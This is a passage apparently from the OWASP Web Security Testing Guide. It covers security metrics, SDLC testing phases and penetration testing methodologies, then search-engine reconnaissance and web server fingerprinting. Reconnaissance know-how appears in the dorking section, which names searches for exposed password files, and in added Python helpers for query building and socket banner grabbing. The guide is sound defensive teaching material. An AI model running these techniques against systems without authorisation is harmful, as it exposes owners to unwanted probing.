Project managers look for data that allows them to successfully manage and utilize security testing activities and resources according to the project plan. To project managers, security test data can show that projects are on schedule and moving on target for delivery dates, and are getting better during tests.

Security test data also helps the business case for security testing if the initiative comes from information security officers (ISOs). For example, it can provide evidence that security testing during the SDLC does not impact the project delivery, but rather reduces the overall workload needed to address vulnerabilities later in production.

To compliance auditors, security test metrics provide a level of software security assurance and confidence that security standard compliance is addressed through the security review processes within the organization.

Finally, Chief Information Officers (CIOs) and Chief Information Security Officers (CISOs), who are responsible for the budget that needs to be allocated to security resources, look to derive a cost-benefit analysis from security test data. This allows them to make informed decisions about which security activities and tools to invest in. One of the metrics that supports such analysis is the Return On Investment (ROI) in security.
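One commonly cited way to quantify security ROI is the Return on Security Investment (ROSI) formulation, which compares the loss expectancy mitigated by the security activity against its cost. This particular formula is not defined in this guide and is shown only as an illustration; its inputs are estimates, so results should be treated as rough:

```python
def rosi(annual_loss_expectancy: float, mitigation_ratio: float, cost: float) -> float:
    """Return on Security Investment.

    ROSI = (ALE * mitigation_ratio - cost) / cost

    annual_loss_expectancy: estimated yearly loss without the measure.
    mitigation_ratio: fraction of that loss the measure is expected to prevent.
    cost: yearly cost of the security testing activity or tools.
    """
    return (annual_loss_expectancy * mitigation_ratio - cost) / cost
```

For instance, a testing program costing 50,000 that is expected to prevent 75% of a 200,000 annual loss expectancy yields a ROSI of 2.0, i.e. the investment returns twice its cost.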
To derive such metrics from security test data, it is important to quantify the differential between the risk due to the exposure of vulnerabilities and the effectiveness of the security tests in mitigating the security risk, and then factor this gap with the cost of the security testing activity or the testing tools adopted.

The OWASP Testing Framework

3.1 The Web Security Testing Framework
3.2 Phase 1 Before Development Begins
3.3 Phase 2 During Definition and Design
3.4 Phase 3 During Development
3.5 Phase 4 During Deployment
3.6 Phase 5 During Maintenance and Operations
3.7 A Typical SDLC Testing Workflow
3.8 Penetration Testing Methodologies

The Web Security Testing Framework

Overview

This section describes a typical testing framework that can be developed within an organization. It can be seen as a reference framework comprised of techniques and tasks that are appropriate at various phases of the software development life cycle (SDLC). Companies and project teams can use this model to develop their own testing framework, and to scope testing services from vendors. This framework should not be seen as prescriptive, but as a flexible approach that can be extended and molded to fit an organization's development process and culture.

This section aims to help organizations build a complete strategic testing process, and is not aimed at consultants or contractors who tend to be engaged in more tactical, specific areas of testing.

It is critical to understand why building an end-to-end testing framework is crucial to assessing and improving software security.
In Writing Secure Code, Howard and LeBlanc note that issuing a security bulletin costs Microsoft at least $100,000, and that it costs their customers collectively far more than that to implement the security patches. They also note that the US government's CyberCrime web site (https://www.justice.gov/criminal-ccips) details recent criminal cases and the losses to organizations. Typical losses far exceed USD $100,000.

With economics like this, it is little wonder that software vendors are moving from solely performing black-box security testing, which can only be performed on applications that have already been developed, to concentrating on testing in the early cycles of application development, such as during definition, design, and development.

Many security practitioners still see security testing as being in the realm of penetration testing. As discussed in the previous chapter, while penetration testing has a role to play, it is generally inefficient at finding bugs and relies excessively on the skill of the tester. It should only be considered as an implementation technique, or used to raise awareness of production issues. To improve the security of applications, the security quality of the software must be improved. That means testing security during the definition, design, development, deployment, and maintenance stages, and not relying on the costly strategy of waiting until code is completely built.

As discussed in the introduction of this document, there are many development methodologies, such as the Rational Unified Process, eXtreme and Agile development, and traditional waterfall methodologies. The intent of this guide is neither to suggest a particular development methodology, nor to provide specific guidance that adheres to any particular methodology.
Instead, we are presenting a generic development model, and the reader should follow it according to their company process.

This testing framework consists of activities that should take place:

Before development begins,
During definition and design,
During development,
During deployment, and
During maintenance and operations.

Phase 1 Before Development Begins

Phase 1.1 Define an SDLC

Before application development starts, an adequate SDLC must be defined where security is inherent at each stage.

Phase 1.2 Review Policies and Standards

Ensure that there are appropriate policies, standards, and documentation in place. Documentation is extremely important as it gives development teams guidelines and policies that they can follow. People can only do the right thing if they know what the right thing is.

If the application is to be developed in Java, it is essential that there is a Java secure coding standard. If the application is to use cryptography, it is essential that there is a cryptography standard. No policies or standards can cover every situation that the development team will face. By documenting the common and predictable issues, there will be fewer decisions that need to be made during the development process.

Phase 1.3 Develop Measurement and Metrics Criteria and Ensure Traceability

Before development begins, plan the measurement program. By defining criteria that need to be measured, it provides visibility into defects in both the process and product.
It is essential to define the metrics before development begins, as there may be a need to modify the process in order to capture the data.

Phase 2 During Definition and Design

Phase 2.1 Review Security Requirements

Security requirements define how an application works from a security perspective. It is essential that the security requirements are tested. Testing in this case means testing the assumptions that are made in the requirements and testing to see if there are gaps in the requirements definitions.

For example, if there is a security requirement that states that users must be registered before they can get access to the whitepapers section of a website, does this mean that the user must be registered with the system or should the user be authenticated? Ensure that requirements are as unambiguous as possible.

When looking for requirements gaps, consider looking at security mechanisms such as:

User management
Authentication
Authorization
Data confidentiality
Integrity
Accountability
Session management
Transport security
Tiered system segregation
Legislative and standards compliance (including privacy, government, and industry standards)

Phase 2.2 Review Design and Architecture

Applications should have a documented design and architecture. This documentation can include models, textual documents, and other similar artifacts. It is essential to test these artifacts to ensure that the design and architecture enforce the appropriate level of security as defined in the requirements.

Identifying security flaws in the design phase is not only one of the most cost-efficient places to identify flaws, but can be one of the most effective places to make changes.
For example, if it is identified that the design calls for authorization decisions to be made in multiple places, it may be appropriate to consider a central authorization component. If the application is performing data validation at multiple places, it may be appropriate to develop a central validation framework (i.e., fixing input validation in one place, rather than in hundreds of places, is far cheaper).

If weaknesses are discovered, they should be given to the system architect for alternative approaches.

Phase 2.3 Create and Review UML Models

Once the design and architecture are complete, build Unified Modeling Language (UML) models that describe how the application works. In some cases, these may already be available. Use these models to confirm with the systems designers an exact understanding of how the application works. If weaknesses are discovered, they should be given to the system architect for alternative approaches.

Phase 2.4 Create and Review Threat Models

Armed with design and architecture reviews and the UML models explaining exactly how the system works, undertake a threat modeling exercise. Develop realistic threat scenarios. Analyze the design and architecture to ensure that these threats have been mitigated, accepted by the business, or assigned to a third party, such as an insurance firm. When identified threats have no mitigation strategies, revisit the design and architecture with the systems architect to modify the design.

Phase 3 During Development

Theoretically, development is the implementation of a design. However, in the real world, many design decisions are made during code development. These are often smaller decisions that were either too detailed to be described in the design, or issues for which no policy or standard guidance was offered.
If the design and architecture were not adequate, the developer will be faced with many decisions. If there were insufficient policies and standards, the developer will be faced with even more decisions.

Phase 3.1 Code Walk Through

The security team should perform a code walk through with the developers, and in some cases, the system architects. A code walk through is a high-level walk through of the code where the developers can explain the logic and flow of the implemented code. It allows the code review team to obtain a general understanding of the code, and allows the developers to explain why certain things were developed the way they were.

The purpose is not to perform a code review, but to understand at a high level the flow, the layout, and the structure of the code that makes up the application.

Phase 3.2 Code Reviews

Armed with a good understanding of how the code is structured and why certain things were coded the way they were, the tester can now examine the actual code for security defects.

Static code reviews validate the code against a set of checklists, including:

Business requirements for availability, confidentiality, and integrity;
OWASP Guide or Top 10 Checklists for technical exposures (depending on the depth of the review);
Specific issues relating to the language or framework in use, such as the Scarlet paper for PHP or the Microsoft Secure Coding checklists for ASP.NET (https://msdn.microsoft.com/en-us/library/ff648269.aspx); and
Any industry-specific requirements, such as Sarbanes-Oxley 404, COPPA, ISO/IEC 27002, APRA, HIPAA, Visa Merchant guidelines, or other regulatory regimes.

In terms of return on resources invested (mostly time), static code reviews produce far higher quality returns than any other security review method and rely least on the skill of the reviewer.
However, they are not a silver bullet and need to be considered carefully within a full-spectrum testing regime.

For more details on OWASP checklists, please refer to the latest edition of the OWASP Top 10 (https://owasp.org/www-project-top-ten/).

Phase 4 During Deployment

Phase 4.1 Application Penetration Testing

Having tested the requirements, analyzed the design, and performed code review, it might be assumed that all issues have been caught. Hopefully this is the case, but penetration testing the application after it has been deployed provides an additional check to ensure that nothing has been missed.

Phase 4.2 Configuration Management Testing

The application penetration test should include an examination of how the infrastructure was deployed and secured. It is important to review configuration aspects, no matter how small, to ensure that none are left at a default setting that may be vulnerable to exploitation.

Phase 5 During Maintenance and Operations

Phase 5.1 Conduct Operational Management Reviews

There needs to be a process in place which details how the operational side of both the application and infrastructure is managed.

Phase 5.2 Conduct Periodic Health Checks

Monthly or quarterly health checks should be performed on both the application and infrastructure to ensure no new security risks have been introduced and that the level of security is still intact.

Phase 5.3 Ensure Change Verification

After every change has been approved and tested in the QA environment and deployed into the production environment, it is vital that the change is checked to ensure that the level of security has not been affected by the change.
This should be integrated into the change management process.

A Typical SDLC Testing Workflow

The following figure shows a typical SDLC testing workflow.

Figure 3-1: Typical SDLC testing workflow

Penetration Testing Methodologies

Summary

OWASP Testing Guide
PCI Penetration Testing Guide
Penetration Testing Execution Standard
NIST 800-115
Penetration Testing Framework
Information Systems Security Assessment Framework (ISSAF)
Open Source Security Testing Methodology Manual (OSSTMM)

Penetration Testing Execution Standard (PTES)

PTES defines penetration testing in 7 phases:

Pre-engagement Interactions
Intelligence Gathering
Threat Modeling
Vulnerability Analysis
Exploitation
Post Exploitation
Reporting

Beyond a methodology or process, PTES also provides hands-on technical guidelines covering what and how to test, the rationale for testing, and recommended testing tools and their usage.

PTES Technical Guidelines (http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines)

PCI Penetration Testing Guide

Payment Card Industry Data Security Standard (PCI DSS) Requirement 11.3 defines penetration testing.
PCI also defines Penetration Testing Guidance.

PCI DSS Penetration Testing Guidance

The PCI DSS penetration testing guideline provides a good reference for the following areas, although it is not a hands-on technical guideline that introduces testing tools:

Penetration Testing Components
Qualifications of a Penetration Tester
Penetration Testing Methodologies
Penetration Testing Reporting Guidelines

PCI DSS Penetration Testing Requirements

The PCI DSS requirements refer to Payment Card Industry Data Security Standard (PCI DSS) Requirement 11.3:

Based on industry-accepted approaches
Coverage for CDE and critical systems
Includes external and internal testing
Test to validate scope reduction
Application-layer testing
Network-layer tests for network and OS

Penetration Testing Framework

The Penetration Testing Framework provides a very comprehensive hands-on penetration testing guide. It also lists the usage of the testing tools in each testing category. The major areas of penetration testing include:

Network Footprinting (Reconnaissance)
Discovery & Probing
Enumeration
Password cracking
Vulnerability Assessment
AS/400 Auditing
Bluetooth Specific Testing
Cisco Specific Testing
Citrix Specific Testing
Network Backbone
Server Specific Tests
VoIP Security
Wireless Penetration
Physical Security
Final Report - template

Penetration Testing Framework (http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html)

Technical Guide to Information Security Testing and Assessment (NIST 800-115)

Information Systems Security Assessment Framework (ISSAF)

The ISSAF is a good reference source for penetration testing, though the Information Systems Security Assessment Framework (ISSAF) is no longer an active community.
It provides comprehensive penetration testing technical guidance. It covers the areas below:

Project Management
Guidelines And Best Practices - Pre-Assessment, Assessment And Post Assessment
Assessment Methodology
Review Of Information Security Policy And Security Organization
Evaluation Of Risk Assessment Methodology
Technical Control Assessment
Technical Control Assessment - Methodology
Password Security
Password Cracking Strategies
Unix/Linux System Security Assessment
Windows System Security Assessment
Novell Netware Security Assessment
Database Security Assessment
Wireless Security Assessment
Switch Security Assessment
Router Security Assessment
Firewall Security Assessment
Intrusion Detection System Security Assessment
VPN Security Assessment
Anti-Virus System Security Assessment And Management Strategy
Web Application Security Assessment
Storage Area Network (SAN) Security
Internet User Security
AS 400 Security
Source Code Auditing
Binary Auditing
Social Engineering
Physical Security Assessment
Incident Analysis
Review Of Logging / Monitoring & Auditing Processes
Business Continuity Planning And Disaster Recovery
Security Awareness And Training
Outsourcing Security Concerns
Knowledge Base
Legal Aspects Of Security Assessment Projects
Non-Disclosure Agreement (NDA)
Security Assessment Contract
Request For Proposal Template
Desktop Security Check-List - Windows
Linux Security Check-List
Solaris Operating System Security Check-List
Default Ports - Firewall
Default Ports - IDS/IPS
Links
Penetration Testing Lab Design

Open Source Security Testing Methodology Manual (OSSTMM)

OSSTMM is a methodology to test the operational security of physical locations, workflow, human security testing, physical security testing, wireless security testing, telecommunication security testing, data network security testing, and compliance. OSSTMM can serve as a supporting reference for ISO 27001 rather than as a hands-on penetration testing guide.

OSSTMM includes the following key sections:

Operational Security Metrics
Trust Analysis
Work Flow
Human Security Testing
Physical Security Testing
Wireless Security Testing
Telecommunications Security Testing
Data Networks Security Testing
Compliance Regulations
Reporting with the STAR (Security Test Audit Report)

References

PCI Data Security Standard - Penetration Testing Guidance (https://www.pcisecuritystandards.org/documents/Penetration-Testing-Guidance-v1_1.pdf)
Pentest Standard (http://www.pentest-standard.org/index.php/Main_Page)
Open Source Security Testing Methodology Manual (OSSTMM) (http://www.isecom.org/research/osstmm.html)
NIST SP 800-115 (https://csrc.nist.gov/publications/detail/sp/800-115/final)
HIPAA 2012 (http://csrc.nist.gov/news_events/hiipaa_june2012/day2/day2-6_kscarfone-rmetzer_security-testing-assessment.pdf)
Penetration Testing Framework 0.59 (http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html)
OWASP Mobile Security Testing Guide (https://owasp.org/www-project-mobile-security-testing-guide/)
Security Testing Guidelines for Mobile Apps (https://owasp.org/www-pdf-archive/Security_Testing_Guidelines_for_mobile_Apps_-_Florian_Stahl%2BJohannes_Stroeher.pdf)
Kali (https://www.kali.org/)
ISSTF (https://sourceforge.net/projects/isstf/files/issaf%20document/issaf0.1/)
Information Supplement: Requirement 11.3 Penetration Testing (https://www.pcisecuritystandards.org/pdfs/infosupp_11_3_penetration_testing.pdf)

Web Application Security Testing

4.0 Introduction and Objectives
4.1 Information Gathering
4.2 Configuration and Deployment Management Testing
4.3 Identity Management Testing
4.4 Authentication Testing
4.5 Authorization Testing
4.6 Session Management Testing
4.7 Input Validation Testing
4.8 Testing for Error Handling
4.9 Testing for Weak Cryptography
4.10 Business Logic Testing
4.11 Client Side Testing

4.0 Introduction and Objectives

This section describes the OWASP web application security testing methodology and explains how to test for evidence of vulnerabilities within the application due to deficiencies with identified security controls.

What is Web Application Security Testing?

A security test is a method of evaluating the security of a computer system or network by methodically validating and verifying the effectiveness of application security controls.
A web application security test focuses only on evaluating the security of a web application. The process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities. Any security issues that are found will be presented to the system owner, together with an assessment of the impact, a proposal for mitigation or a technical solution.

What is a Vulnerability?

A vulnerability is a flaw or weakness in a system's design, implementation, operation or management that could be exploited to compromise the system's security objectives.

What is a Threat?

A threat is anything (a malicious external attacker, an internal user, a system instability, etc) that may harm the assets owned by an application (resources of value, such as the data in a database or in the file system) by exploiting a vulnerability.

What is a Test?

A test is an action to demonstrate that an application meets the security requirements of its stakeholders.

The Approach in Writing this Guide

The OWASP approach is open and collaborative:

Open: every security expert can participate with his or her experience in the project. Everything is free.
Collaborative: brainstorming is performed before the articles are written so the team can share ideas and develop a collective vision of the project. That means rough consensus, a wider audience and increased participation.

This approach tends to create a defined Testing Methodology that will be:

Consistent
Reproducible
Rigorous
Under quality control

The problems to be addressed are fully documented and tested.
It is important to use a method to test all known</p><p>vulnerabilities and document all the security test activities.</p><p>What Is the OWASP Testing Methodology?</p><p>Security testing will never be an exact science where a complete list of all possible issues that should be tested can be</p><p>defined. Indeed, security testing is only an appropriate technique for testing the security of web applications under</p><p>certain circumstances. The goal of this project is to collect all the possible testing techniques, explain these techniques,</p><p>and keep the guide updated. The OWASP Web Application Security Testing method is based on the black box</p><p>approach. The tester knows nothing or has very little information about the application to be tested.</p><p>The testing model consists of:</p><p>Web Security Testing Guide v4.1</p><p>45</p><p>Tester: Who performs the testing activities</p><p>Tools and methodology: The core of this Testing Guide project</p><p>Application: The black box to test</p><p>Testing can be categorized as passive or active:</p><p>Passive Testing</p><p>During passive testing, a tester tries to understand the application’s logic and explores the application as a user. Tools</p><p>can be used for information gathering. For example, an HTTP proxy can be used to observe all the HTTP requests and</p><p>responses. At the end of this phase, the tester should understand all the access points (gates) of the application (e.g.,</p><p>HTTP headers, parameters, and cookies). 
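</p><p>As an illustration (an addition to this section, not part of the original methodology), the gates observed during passive testing can be tabulated programmatically. The sketch below uses only Python's standard library, and the URLs are placeholders in the style of this guide's example.com examples:</p><p>
```python
# Illustrative sketch: reduce a set of URLs captured via an HTTP proxy to a
# map of paths to their query parameter names (the "gates").
from urllib.parse import urlparse, parse_qs

def extract_gates(urls):
    """Map each path to the set of query parameter names seen for it."""
    gates = {}
    for url in urls:
        parts = urlparse(url)
        # keep_blank_values retains parameters that appear without a value
        params = set(parse_qs(parts.query, keep_blank_values=True))
        gates.setdefault(parts.path, set()).update(params)
    return gates

observed = [
    "http://www.example.com/Appx.jsp?a=1&b=1",
    "http://www.example.com/Appx.jsp?a=2&c=3",
]
# The two URLs above expose three gates on /Appx.jsp: a, b and c.
gates = extract_gates(observed)
```
</p><p>Each entry of the resulting map corresponds to one row of the access-point spreadsheet suggested in this section.</p><p>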
The Information Gathering section explains how to perform passive testing.</p><p>For example, a tester may find a page at the following URL:</p><p>https://www.example.com/login/Authentic_Form.html</p><p>This may indicate an authentication form where the application requests a username and a password.</p><p>The following parameters represent two access points (gates) to the application:</p><p>http://www.example.com/Appx.jsp?a=1&b=1</p><p>In this case, the application shows two gates (parameters a and b). All the gates found in this phase represent a point of</p><p>testing. A spreadsheet with the directory tree of the application and all the access points may be useful during active</p><p>testing.</p><p>Active Testing</p><p>During active testing, a tester begins to use the methodologies described in the following sections.</p><p>The set of active tests has been split into 11 sub-categories for a total of 91 controls:</p><p>Information Gathering</p><p>Configuration and Deployment Management Testing</p><p>Identity Management Testing</p><p>Authentication Testing</p><p>Authorization Testing</p><p>Session Management Testing</p><p>Input Validation Testing</p><p>Error Handling</p><p>Cryptography</p><p>Business Logic Testing</p><p>Client Side Testing</p><p>Web Security Testing Guide v4.1</p><p>46</p><p>4.1 Information Gathering</p><p>4.1.1 Conduct Search Engine Discovery Reconnaissance for Information Leakage</p><p>4.1.2 Fingerprint Web Server</p><p>4.1.3 Review Webserver Metafiles for Information Leakage</p><p>4.1.4 Enumerate Applications on Webserver</p><p>4.1.5 Review Webpage Comments and Metadata for Information Leakage</p><p>4.1.6 Identify Application Entry Points</p><p>4.1.7 Map Execution Paths Through Application</p><p>4.1.8 Fingerprint Web Application Framework</p><p>4.1.9 Fingerprint Web Application</p><p>4.1.10 Map Application Architecture</p><p>Web Security Testing Guide v4.1</p><p>47</p><p>Conduct Search Engine Discovery Reconnaissance for Information 
Leakage</p><p>ID</p><p>WSTG-INFO-01</p><p>Summary</p><p>In order for search engines to work, computer programs (or “robots”) regularly fetch data (referred to as crawling) from</p><p>billions of pages on the web. These programs find web pages by following links from other pages, or by looking at</p><p>sitemaps. If a website uses a special file called “robots.txt” to list pages that it does not want search engines to fetch,</p><p>then the pages listed there will be ignored. This is a basic overview; Google offers a more in-depth explanation of how</p><p>a search engine works.</p><p>Testers can use search engines to perform reconnaissance on websites and web applications. There are direct and</p><p>indirect elements to search engine discovery and reconnaissance: direct methods relate to searching the indexes and</p><p>the associated content from caches, while indirect methods relate to learning sensitive design and configuration</p><p>information by searching forums, newsgroups, and tendering websites.</p><p>Once a search engine robot has completed crawling, it commences indexing the web page based on tags and</p><p>associated attributes, such as <TITLE> , in order to return the relevant search results. If the robots.txt file is not updated</p><p>during the lifetime of the web site, and inline HTML meta tags that instruct robots not to index content have not been</p><p>used, then it is possible for indexes to contain web content not intended to be included by the owners. Website owners</p><p>may use the previously mentioned robots.txt, HTML meta tags, authentication, and tools provided by search engines to</p><p>remove such content.</p><p>Test Objectives</p><p>To understand what sensitive design and configuration information of the application, system, or organization is</p><p>exposed either directly (on the organization’s website) or indirectly (on a third-party website).</p><p>How to Test</p><p>Use a search engine to search for potentially sensitive information. 
This may include:</p><p>network diagrams and configurations;</p><p>archived posts and emails by administrators and other key staff;</p><p>log on procedures and username formats;</p><p>usernames, passwords, and private keys;</p><p>third-party, or cloud service configuration files;</p><p>revealing error message content; and</p><p>development, test, user acceptance testing (UAT), and staging versions of the website.</p><p>Search Engines</p><p>Do not limit testing to just one search engine provider, as different search engines may generate different results.</p><p>Search engine results can vary in a few ways, depending on when the engine last crawled content, and the algorithm</p><p>the engine uses to determine relevant pages. Consider using the following (alphabetically-listed) search engines:</p><p>Baidu, China’s most popular search engine.</p><p>Bing, a search engine owned and operated by Microsoft, and the second most popular worldwide. Supports</p><p>advanced search keywords.</p><p>https://en.wikipedia.org/wiki/Web_crawler</p><p>https://support.google.com/webmasters/answer/70897?hl=en</p><p>https://www.baidu.com/</p><p>https://en.wikipedia.org/wiki/Web_search_engine#Market_share</p><p>https://www.bing.com/</p><p>https://en.wikipedia.org/wiki/Web_search_engine#Market_share</p><p>http://help.bing.microsoft.com/#apex/18/en-US/10001/-1</p><p>Web Security Testing Guide v4.1</p><p>48</p><p>binsearch.info, a search engine for binary Usenet newsgroups.</p><p>DuckDuckGo, a privacy-focused search engine that compiles results from many different sources. Supports search</p><p>syntax.</p><p>Google, which offers the world’s most popular search engine, and uses a ranking system to attempt to return the</p><p>most relevant results. Supports search operators.</p><p>Startpage, a search engine that uses Google’s results without collecting personal information through trackers and</p><p>logs. 
Supports search operators.</p><p>Shodan, a service for searching Internet-connected devices and services. Usage options include a limited free</p><p>plan as well as paid subscription plans.</p><p>Both DuckDuckGo and Startpage offer some increased privacy to users by not utilizing trackers or keeping logs. This</p><p>can provide reduced information leakage about the tester.</p><p>Search Operators</p><p>A search operator is a special keyword that extends the capabilities of regular search queries, and can help obtain</p><p>more specific results. They generally take the form of operator:query . Here are some commonly supported search</p><p>operators:</p><p>site: will limit the search to the provided URL.</p><p>inurl: will only return results that include the keyword in the URL.</p><p>intitle: will only return results that have the keyword in the page title.</p><p>intext: or inbody: will only search for the keyword in the body of pages.</p><p>filetype: will match only a specific filetype, i.e. png, or php.</p><p>For example, to find the web content of owasp.org as indexed by a typical search engine, the syntax required is:</p><p>site:owasp.org</p><p>Figure 4.1.1-1: Google Site Operation Search Result Example</p><p>Viewing Cached Content</p><p>To search for content that has previously been indexed, use the cache: operator. This is helpful for viewing content</p><p>that may have changed since the time it was indexed, or that may no longer be available. 
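</p><p>As a hypothetical illustration (an addition to this section, not an OWASP tool), the operators described above compose mechanically into reusable queries for a target domain:</p><p>
```python
# Illustrative helper: generate operator-based queries for a target domain.
# The specific templates here are examples, not an exhaustive or official list.
def build_queries(domain):
    templates = [
        "site:{d}",                     # limit results to the target
        "cache:{d}",                    # view previously indexed content
        "site:{d} filetype:log",        # look for exposed log files
        'site:{d} intitle:"index of"',  # look for open directory listings
    ]
    return [t.format(d=domain) for t in templates]

queries = build_queries("owasp.org")
# e.g. queries[0] == "site:owasp.org"
```
</p><p>Such generated lists are convenient for feeding the same reconnaissance queries to several search engines, since operator support varies between them.</p><p>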
Not all search engines</p><p>provide cached content to search; the most useful source at time of writing is Google.</p><p>https://binsearch.info/</p><p>https://duckduckgo.com/</p><p>https://help.duckduckgo.com/results/sources/</p><p>https://help.duckduckgo.com/duckduckgo-help-pages/results/syntax/</p><p>https://www.google.com/</p><p>https://en.wikipedia.org/wiki/Web_search_engine#Market_share</p><p>https://support.google.com/websearch/answer/2466433</p><p>https://www.startpage.com/</p><p>https://support.startpage.com/index.php?/Knowledgebase/Article/View/989/0/advanced-search-which-search-operators-are-supported-by-startpagecom</p><p>https://www.shodan.io/</p><p>Web Security Testing Guide v4.1</p><p>49</p><p>To view owasp.org as it is cached, the syntax is:</p><p>cache:owasp.org</p><p>Figure 4.1.1-2: Google Cache Operation Search Result Example</p><p>Google Hacking, or Dorking</p><p>Searching with operators can be a very effective discovery reconnaissance technique when combined with the</p><p>creativity of the tester. Operators can be chained to effectively discover specific kinds of sensitive files and information.</p><p>This technique, called Google hacking or Google dorking, is also possible using other search engines, as long as the</p><p>search operators are supported.</p><p>A database of dorks, such as Google Hacking Database, is a useful resource that can help uncover specific</p><p>information. 
Some categories of dorks available on this database include:</p><p>Footholds</p><p>Files containing usernames</p><p>Sensitive Directories</p><p>Web Server Detection</p><p>Vulnerable Files</p><p>Vulnerable Servers</p><p>Error Messages</p><p>Files containing juicy info</p><p>Files containing passwords</p><p>Sensitive Online Shopping Info</p><p>Databases for other search engines, such as Bing and Shodan, are available from resources such as Bishop Fox’s</p><p>Google Hacking Diggity Project.</p><p>Remediation</p><p>Carefully consider the sensitivity of design and configuration information before it is posted online.</p><p>Periodically review the sensitivity of existing design and configuration information that is posted online.</p><p>https://en.wikipedia.org/wiki/Google_hacking</p><p>https://www.exploit-db.com/google-hacking-database</p><p>https://resources.bishopfox.com/resources/tools/google-hacking-diggity/</p><p>Web Security Testing Guide v4.1</p><p>50</p><p>Fingerprint Web Server</p><p>ID</p><p>WSTG-INFO-02</p><p>Summary</p><p>Web server fingerprinting is the task of identifying the type and version of web server that a target is running on. While</p><p>web server fingerprinting is often encapsulated in automated testing tools, it is important for researchers to understand</p><p>the fundamentals of how these tools attempt to identify software, and why this is useful.</p><p>Accurately discovering the type of web server that an application runs on can enable security testers to determine if the</p><p>application is vulnerable to attack. 
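</p><p>As a sketch of the banner-grabbing technique described below (an illustrative addition; the guide's own examples use telnet and openssl), the Server header can be read over a raw socket. Any host passed to it is a placeholder, not a suggested target:</p><p>
```python
# Illustrative banner grab over plain HTTP: send a HEAD request and extract
# the Server response header, if the application exposes one.
import socket

def parse_server_header(raw_response):
    """Return the value of the Server header from a raw HTTP response, or None."""
    for line in raw_response.split("\r\n"):
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return None

def grab_banner(host, port=80, timeout=5):
    request = f"HEAD / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request.encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_server_header(b"".join(chunks).decode(errors="replace"))

# Applied to an Apache-style response like the ones shown in this section:
sample = "HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Unix)\r\n\r\n"
banner = parse_server_header(sample)  # "Apache/2.4.41 (Unix)"
```
</p><p>A suppressed or modified banner simply yields None or a decoy string, which is itself useful information when combined with the other fingerprinting techniques in this section.</p><p>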
In particular, servers running older versions of software without up-to-date security</p><p>patches can be susceptible to known version-specific exploits.</p><p>Test Objectives</p><p>Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.</p><p>How to Test</p><p>Techniques used for web server fingerprinting include banner grabbing, eliciting responses to malformed requests, and</p><p>using automated tools to perform more robust scans that use a combination of tactics. The fundamental premise by</p><p>which all these techniques operate is the same. They all strive to elicit some response from the web server which can</p><p>then be compared to a database of known responses and behaviors, and thus matched to a known server type.</p><p>Banner Grabbing</p><p>A banner grab is performed by sending an HTTP request to the web server and examining its response header. This</p><p>can be accomplished using a variety of tools, including telnet for HTTP requests, or openssl for requests over SSL.</p><p>For example, here is the response to a request from an Apache server.</p><p>HTTP/1.1 200 OK</p><p>Date: Thu, 05 Sep 2019 17:42:39 GMT</p><p>Server: Apache/2.4.41 (Unix)</p><p>Last-Modified: Thu, 05 Sep 2019 17:40:42 GMT</p><p>ETag: "75-591d1d21b6167"</p><p>Accept-Ranges: bytes</p><p>Content-Length: 117</p><p>Connection: close</p><p>Content-Type: text/html</p><p>...</p><p>Here is another response, this time from nginx.</p><p>HTTP/1.1 200 OK</p><p>Server: nginx/1.17.3</p><p>Date: Thu, 05 Sep 2019 17:50:24 GMT</p><p>Content-Type: text/html</p><p>Content-Length: 117</p><p>Last-Modified: Thu, 05 Sep 2019 17:40:42 GMT</p><p>Connection: close</p><p>ETag: "5d71489a-75"</p><p>Accept-Ranges: bytes</p><p>...</p><p>https://en.wikipedia.org/wiki/Banner_grabbing</p><p>https://developer.mozilla.org/en-US/docs/Glossary/Response_header</p><p>Web Security Testing Guide v4.1</p><p>51</p><p>Here’s what a response from lighttpd looks 
like.</p><p>HTTP/1.0 200 OK</p><p>Content-Type: text/html</p><p>Accept-Ranges: bytes</p><p>ETag: "4192788355"</p><p>Last-Modified: Thu, 05 Sep 2019 17:40:42 GMT</p><p>Content-Length: 117</p><p>Connection: close</p><p>Date: Thu, 05 Sep 2019 17:57:57 GMT</p><p>Server: lighttpd/1.4.54</p><p>In these examples, the server type and version is clearly exposed. However, security-conscious applications may</p><p>obfuscate their server information by modifying the header. For example, here is an excerpt from the response to a</p><p>request for a site with a modified header:</p><p>HTTP/1.1 200 OK</p><p>Server: Website.com</p><p>Date: Thu, 05 Sep 2019 17:57:06 GMT</p><p>Content-Type: text/html; charset=utf-8</p><p>Status: 200 OK</p><p>...</p><p>In cases where the server information is obscured, testers may guess the type of server based on the ordering of the</p><p>header fields. Note that in the Apache example above, the fields follow this order:</p><p>Date</p><p>Server</p><p>Last-Modified</p><p>ETag</p><p>Accept-Ranges</p><p>Content-Length</p><p>Connection</p><p>Content-Type</p><p>However, in both the nginx and obscured server examples, the fields in common follow this order:</p><p>Server</p><p>Date</p><p>Content-Type</p><p>Testers can use this information to guess that the obscured server is nginx. However, considering that a number of</p><p>different web servers may share the same field ordering and fields can be modified or removed, this method is not</p><p>definite.</p><p>Sending Malformed Requests</p><p>Web servers may be identified by examining their error responses, and in the cases where they have not been</p><p>customized, their default error pages. 
